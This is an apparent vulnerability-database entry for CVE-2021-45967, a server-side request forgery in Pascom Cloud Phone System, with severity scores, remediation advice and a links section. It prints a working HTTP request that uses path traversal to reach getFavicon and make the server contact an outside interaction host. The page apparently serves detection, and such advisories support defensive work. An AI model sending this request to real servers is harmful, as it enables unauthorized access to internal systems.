🔙 목록으로 돌아가기

CVE-2021-45967: Pascom CPS Server-Side Request Forgery

TitlePascom CPS Server-Side Request Forgery
Authordwisiswant0
SeverityCritical
ImpactThe vulnerability can result in unauthorized access to sensitive data or systems, potentially leading to further exploitation or compromise.
RemediationApply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967).
CVSS Score9.8
EPSS Score0.8933
CVE IDCVE-2021-45967
CWE IDCWE-22
Tags cve cve2021 pascom ssrf pascom_cloud_phone_system vkev vuln

🔍 Vulnerability Description

Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.

🌐 HTTP Request

GET /services/pluginscript/..;/..;/..;/getFavicon?host=d5jobm9le0o45f7qlpi0cmn6nzmts3yko.oast.site HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-45967.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-45967.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A